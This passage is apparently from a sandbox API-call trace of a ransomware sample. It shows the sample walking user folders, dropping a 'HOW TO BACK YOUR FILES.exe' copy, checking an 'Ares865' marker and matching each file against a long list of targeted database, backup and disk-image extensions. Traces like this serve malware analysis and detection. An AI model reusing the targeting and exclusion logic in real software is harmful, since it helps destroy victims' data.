lpString1="Temporary Internet Files") returned="Temporary Internet Files" [0041.053] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23a0 [0041.053] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7c) returned 0x2effc8 [0041.053] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23a8 | out: ListHead=0x2e77d0, ListEntry=0x2d23a8) returned 0x2d2388 [0041.053] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 0 [0041.053] FindClose (in: hFindFile=0x2cd028 | out: hFindFile=0x2cd028) returned 1 [0041.054] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d23a8 [0041.054] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files") returned="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files" [0041.054] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0041.054] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0041.054] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files") returned 61 [0041.054] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files") returned="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files" [0041.054] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0041.054] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\temporary internet files\\how to back your files.exe"), bFailIfExists=1) returned 1 [0041.307] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0041.307] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a3658a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a3658a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd028 [0041.307] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.307] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0041.307] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0041.307] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a3658a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a3658a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.307] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.307] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0041.308] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0041.308] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0041.308] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x661a180, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3e5e3095, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Content.IE5", cAlternateFileName="")) returned 1 [0041.308] lstrcmpiW (lpString1="Content.IE5", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.308] lstrcmpiW (lpString1="Content.IE5", lpString2="aoldtz.exe") returned 1 [0041.308] lstrcmpiW (lpString1="Content.IE5", lpString2=".") returned 1 [0041.308] lstrcmpiW (lpString1="Content.IE5", lpString2="..") returned 1 [0041.308] lstrcmpiW (lpString1="Content.IE5", lpString2="windows") returned -1 [0041.308] lstrcmpiW (lpString1="Content.IE5", lpString2="bootmgr") returned 1 [0041.308] lstrcmpiW (lpString1="Content.IE5", lpString2="temp") returned -1 [0041.308] lstrcmpiW (lpString1="Content.IE5", lpString2="pagefile.sys") returned -1 [0041.308] lstrcmpiW (lpString1="Content.IE5", lpString2="boot") returned 1 [0041.308] lstrcmpiW (lpString1="Content.IE5", lpString2="ids.txt") returned -1 [0041.308] lstrcmpiW (lpString1="Content.IE5", lpString2="ntuser.dat") returned -1 [0041.308] lstrcmpiW (lpString1="Content.IE5", lpString2="perflogs") returned -1 [0041.308] lstrcmpiW (lpString1="Content.IE5", lpString2="MSBuild") returned -1 [0041.308] lstrlenW (lpString="Content.IE5") returned 11 [0041.308] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\*") returned 63 [0041.308] lstrcpyW (in: lpString1=0x2e2e8dc, lpString2="Content.IE5" | out: lpString1="Content.IE5") returned="Content.IE5" [0041.308] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23a0 [0041.308] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x94) returned 0x2cb388 [0041.308] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23a8 | out: ListHead=0x2e77d0, ListEntry=0x2d23a8) returned 0x2d2388 [0041.308] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x65f4020, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x65f4020, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe710360, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0041.308] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.308] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0041.308] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0041.308] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0041.308] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0041.308] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0041.308] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0041.308] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0041.308] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0041.308] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0041.308] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0041.309] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0041.309] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0041.309] lstrlenW (lpString="desktop.ini") returned 11 [0041.309] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5") returned 73 [0041.309] lstrcpyW (in: lpString1=0x2e2e8dc, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0041.309] lstrlenW (lpString="desktop.ini") returned 11 [0041.309] lstrlenW (lpString="Ares865") returned 7 [0041.309] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0041.309] lstrlenW (lpString=".dll") returned 4 [0041.309] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0041.309] lstrlenW (lpString=".lnk") returned 4 [0041.309] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0041.309] lstrlenW (lpString=".ini") returned 4 [0041.309] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0041.309] lstrlenW (lpString=".sys") returned 4 [0041.309] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0041.309] lstrlenW (lpString="desktop.ini") returned 11 [0041.309] lstrlenW (lpString="bak") returned 3 [0041.309] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0041.309] lstrlenW (lpString="ba_") returned 3 [0041.309] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0041.309] lstrlenW (lpString="dbb") returned 3 [0041.309] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0041.309] lstrlenW (lpString="vmdk") returned 4 [0041.309] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0041.309] lstrlenW (lpString="rar") returned 3 [0041.309] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0041.309] lstrlenW (lpString="zip") returned 3 [0041.309] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0041.309] lstrlenW (lpString="tgz") returned 3 [0041.309] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0041.309] lstrlenW (lpString="vbox") returned 4 [0041.309] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0041.309] lstrlenW (lpString="vdi") returned 3 [0041.310] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0041.310] lstrlenW (lpString="vhd") returned 3 [0041.310] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0041.310] lstrlenW (lpString="vhdx") returned 4 [0041.310] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0041.310] lstrlenW (lpString="avhd") returned 4 [0041.310] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0041.310] lstrlenW (lpString="db") returned 2 [0041.310] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0041.310] lstrlenW (lpString="db2") returned 3 [0041.310] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0041.310] lstrlenW (lpString="db3") returned 3 [0041.310] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0041.310] lstrlenW (lpString="dbf") returned 3 [0041.310] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0041.310] lstrlenW (lpString="mdf") returned 3 [0041.310] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0041.310] lstrlenW (lpString="mdb") returned 3 [0041.310] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0041.310] lstrlenW (lpString="sql") returned 3 [0041.310] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0041.310] lstrlenW (lpString="sqlite") returned 6 [0041.310] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0041.310] lstrlenW (lpString="sqlite3") returned 7 [0041.310] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0041.310] lstrlenW (lpString="sqlitedb") returned 8 [0041.310] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0041.310] lstrlenW (lpString="xml") returned 3 [0041.310] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0041.310] lstrlenW (lpString="$er") returned 3 [0041.310] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0041.310] lstrlenW (lpString="4dd") returned 3 [0041.310] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0041.310] lstrlenW (lpString="4dl") returned 3 [0041.310] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0041.311] lstrlenW (lpString="^^^") returned 3 [0041.311] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0041.311] lstrlenW (lpString="abs") returned 3 [0041.311] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0041.311] lstrlenW (lpString="abx") returned 3 [0041.311] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0041.311] lstrlenW (lpString="accdb") returned 5 [0041.311] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0041.311] lstrlenW (lpString="accdc") returned 5 [0041.311] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0041.311] lstrlenW (lpString="accde") returned 5 [0041.311] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0041.311] lstrlenW (lpString="accdr") returned 5 [0041.311] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0041.311] lstrlenW (lpString="accdt") returned 5 [0041.311] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0041.311] lstrlenW (lpString="accdw") returned 5 [0041.311] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0041.311] lstrlenW (lpString="accft") returned 5 [0041.311] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0041.311] lstrlenW (lpString="adb") returned 3 [0041.311] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0041.311] lstrlenW (lpString="adb") returned 3 [0041.311] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0041.311] lstrlenW (lpString="ade") returned 3 [0041.311] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0041.311] lstrlenW (lpString="adf") returned 3 [0041.311] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0041.311] lstrlenW (lpString="adn") returned 3 [0041.311] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0041.311] lstrlenW (lpString="adp") returned 3 [0041.311] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0041.311] lstrlenW (lpString="alf") returned 3 [0041.311] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0041.312] lstrlenW (lpString="ask") returned 3 [0041.312] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0041.312] lstrlenW (lpString="btr") returned 3 [0041.312] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0041.312] lstrlenW (lpString="cat") returned 3 [0041.312] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0041.312] lstrlenW (lpString="cdb") returned 3 [0041.312] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0041.312] lstrlenW (lpString="ckp") returned 3 [0041.312] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0041.312] lstrlenW (lpString="cma") returned 3 [0041.312] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0041.312] lstrlenW (lpString="cpd") returned 3 [0041.312] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0041.312] lstrlenW (lpString="dacpac") returned 6 [0041.312] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0041.312] lstrlenW (lpString="dad") returned 3 [0041.312] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0041.312] lstrlenW (lpString="dadiagrams") returned 10 [0041.312] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0041.312] lstrlenW (lpString="daschema") returned 8 [0041.312] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0041.312] lstrlenW (lpString="db-journal") returned 10 [0041.312] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0041.312] lstrlenW (lpString="db-shm") returned 6 [0041.312] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0041.312] lstrlenW (lpString="db-wal") returned 6 [0041.312] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0041.312] lstrlenW (lpString="dbc") returned 3 [0041.312] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0041.312] lstrlenW (lpString="dbs") returned 3 [0041.312] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0041.312] lstrlenW (lpString="dbt") returned 3 [0041.312] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0041.312] lstrlenW (lpString="dbv") returned 3 [0041.313] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0041.313] lstrlenW (lpString="dbx") returned 3 [0041.313] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0041.313] lstrlenW (lpString="dcb") returned 3 [0041.313] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0041.313] lstrlenW (lpString="dct") returned 3 [0041.313] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0041.313] lstrlenW (lpString="dcx") returned 3 [0041.313] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0041.313] lstrlenW (lpString="ddl") returned 3 [0041.313] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0041.313] lstrlenW (lpString="dlis") returned 4 [0041.313] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0041.313] lstrlenW (lpString="dp1") returned 3 [0041.313] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0041.313] lstrlenW (lpString="dqy") returned 3 [0041.313] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0041.313] lstrlenW (lpString="dsk") returned 3 [0041.313] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0041.313] lstrlenW (lpString="dsn") returned 3 [0041.313] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0041.313] lstrlenW (lpString="dtsx") returned 4 [0041.313] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0041.313] lstrlenW (lpString="dxl") returned 3 [0041.313] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0041.313] lstrlenW (lpString="eco") returned 3 [0041.313] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0041.313] lstrlenW (lpString="ecx") returned 3 [0041.313] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0041.313] lstrlenW (lpString="edb") returned 3 [0041.313] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0041.313] lstrlenW (lpString="epim") returned 4 [0041.313] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0041.313] lstrlenW (lpString="fcd") returned 3 [0041.314] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0041.314] lstrlenW (lpString="fdb") returned 3 [0041.314] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0041.314] lstrlenW (lpString="fic") returned 3 [0041.314] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0041.314] lstrlenW (lpString="flexolibrary") returned 12 [0041.314] lstrlenW (lpString="fm5") returned 3 [0041.314] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0041.314] lstrlenW (lpString="fmp") returned 3 [0041.314] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0041.314] lstrlenW (lpString="fmp12") returned 5 [0041.314] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0041.314] lstrlenW (lpString="fmpsl") returned 5 [0041.314] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0041.314] lstrlenW (lpString="fol") returned 3 [0041.314] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0041.314] lstrlenW (lpString="fp3") returned 3 [0041.314] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0041.314] lstrlenW (lpString="fp4") returned 3 [0041.314] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0041.314] lstrlenW (lpString="fp5") returned 3 [0041.314] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0041.314] lstrlenW (lpString="fp7") returned 3 [0041.314] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0041.314] lstrlenW (lpString="fpt") returned 3 [0041.314] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0041.314] lstrlenW (lpString="frm") returned 3 [0041.314] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0041.314] lstrlenW (lpString="gdb") returned 3 [0041.314] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0041.314] lstrlenW (lpString="gdb") returned 3 [0041.314] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0041.314] lstrlenW (lpString="grdb") returned 4 [0041.314] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0041.314] lstrlenW (lpString="gwi") returned 3 [0041.314] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0041.314] lstrlenW (lpString="hdb") returned 3 [0041.315] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0041.315] lstrlenW (lpString="his") returned 3 [0041.315] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0041.315] lstrlenW (lpString="ib") returned 2 [0041.315] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0041.315] lstrlenW (lpString="idb") returned 3 [0041.315] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0041.315] lstrlenW (lpString="ihx") returned 3 [0041.315] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0041.315] lstrlenW (lpString="itdb") returned 4 [0041.315] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0041.315] lstrlenW (lpString="itw") returned 3 [0041.315] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0041.315] lstrlenW (lpString="jet") returned 3 [0041.315] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0041.315] lstrlenW (lpString="jtx") returned 3 [0041.315] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0041.315] lstrlenW (lpString="kdb") returned 3 [0041.315] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0041.315] lstrlenW (lpString="kexi") returned 4 [0041.315] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0041.315] lstrlenW (lpString="kexic") returned 5 [0041.315] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0041.315] lstrlenW (lpString="kexis") returned 5 [0041.315] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0041.315] lstrlenW (lpString="lgc") returned 3 [0041.315] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0041.315] lstrlenW (lpString="lwx") returned 3 [0041.315] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0041.315] lstrlenW (lpString="maf") returned 3 [0041.315] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0041.315] lstrlenW (lpString="maq") returned 3 [0041.315] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0041.315] lstrlenW (lpString="mar") returned 3 [0041.315] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0041.315] lstrlenW (lpString="marshal") returned 7 [0041.316] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0041.316] lstrlenW (lpString="mas") returned 3 [0041.316] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0041.316] lstrlenW (lpString="mav") returned 3 [0041.316] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0041.316] lstrlenW (lpString="maw") returned 3 [0041.316] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0041.316] lstrlenW (lpString="mdbhtml") returned 7 [0041.316] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0041.316] lstrlenW (lpString="mdn") returned 3 [0041.316] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0041.316] lstrlenW (lpString="mdt") returned 3 [0041.316] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0041.316] lstrlenW (lpString="mfd") returned 3 [0041.316] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0041.316] lstrlenW (lpString="mpd") returned 3 [0041.316] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0041.316] lstrlenW (lpString="mrg") returned 3 [0041.316] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0041.316] lstrlenW (lpString="mud") returned 3 [0041.316] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0041.316] lstrlenW (lpString="mwb") returned 3 [0041.316] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0041.316] lstrlenW (lpString="myd") returned 3 [0041.316] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0041.316] lstrlenW (lpString="ndf") returned 3 [0041.316] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0041.316] lstrlenW (lpString="nnt") returned 3 [0041.316] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0041.316] lstrlenW (lpString="nrmlib") returned 6 [0041.316] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0041.316] lstrlenW (lpString="ns2") returned 3 [0041.316] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0041.316] lstrlenW (lpString="ns3") returned 3 [0041.316] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0041.317] lstrlenW (lpString="ns4") returned 3 [0041.317] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0041.317] lstrlenW (lpString="nsf") returned 3 [0041.317] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0041.317] lstrlenW (lpString="nv") returned 2 [0041.317] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0041.317] lstrlenW (lpString="nv2") returned 3 [0041.317] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0041.317] lstrlenW (lpString="nwdb") returned 4 [0041.317] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0041.317] lstrlenW (lpString="nyf") returned 3 [0041.317] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0041.317] lstrlenW (lpString="odb") returned 3 [0041.317] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0041.317] lstrlenW (lpString="odb") returned 3 [0041.317] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0041.317] lstrlenW (lpString="oqy") returned 3 [0041.317] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0041.317] lstrlenW (lpString="ora") returned 3 [0041.317] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0041.317] lstrlenW (lpString="orx") returned 3 [0041.317] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0041.317] lstrlenW (lpString="owc") returned 3 [0041.317] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0041.317] lstrlenW (lpString="p96") returned 3 [0041.317] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0041.317] lstrlenW (lpString="p97") returned 3 [0041.317] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0041.317] lstrlenW (lpString="pan") returned 3 [0041.317] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0041.317] lstrlenW (lpString="pdb") returned 3 [0041.317] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0041.317] lstrlenW (lpString="pdm") returned 3 [0041.317] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0041.317] lstrlenW (lpString="pnz") returned 3 [0041.317] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0041.317] lstrlenW (lpString="qry") returned 3 [0041.318] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0041.318] lstrlenW (lpString="qvd") returned 3 [0041.318] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0041.318] lstrlenW (lpString="rbf") returned 3 [0041.318] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0041.318] lstrlenW (lpString="rctd") returned 4 [0041.318] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0041.318] lstrlenW (lpString="rod") returned 3 [0041.318] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0041.318] lstrlenW (lpString="rodx") returned 4 [0041.318] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0041.318] lstrlenW (lpString="rpd") returned 3 [0041.318] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0041.318] lstrlenW (lpString="rsd") returned 3 [0041.318] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 